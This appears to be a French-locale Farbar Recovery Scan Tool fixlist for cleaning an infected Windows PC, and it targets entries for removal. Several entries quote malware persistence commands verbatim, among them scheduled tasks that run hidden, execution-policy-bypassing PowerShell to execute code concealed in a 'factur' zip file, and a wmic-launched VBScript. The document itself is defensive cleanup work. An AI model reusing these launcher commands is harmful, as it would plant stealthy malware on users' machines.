start::
closeprocesses:
createrestorepoint:
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] -> 
Task: {45534676-3762-4DD1-B1E5-4751288BF11A} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe
Task: {5EF1200A-88FF-48C7-9CAD-7D2594809D3A} - System32\Tasks\AI => C:\WINDOWS\system32\cmd.exe /c powershell -eP bypasS -win Hi"dde"n -c "&{$v=dir c:\users -r -in factur*.zip|select -last 1;$y=gc -LiteralPat $v.fullname;$y[$y.length-1]|iex}" <==== ATTENTION
Task: {68D793C5-4127-4589-84C4-EE4252D72616} - System32\Tasks\AppRunLog => powershell.exe -wiNdowStylE HiDden -exe bypass -file C:\Users\metro\AppData\Roaming\6D788C\8XbAIxIm77GG3R7OyZ7R7R.ps1
Task: {6DADBC0E-4DD0-47B0-80ED-A180F5EF2218} - System32\Tasks\kctwswdq => wmic.exe process call create "wscript.exe C:\Users\metro\AppData\Roaming\upxrkcff\kctwswdq.vbs"
C:\Users\metro\AppData\Roaming\upxrkcff
Task: {7387BBCC-A5E8-4DBD-980B-7B2227E03120} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
emptytemp:
end::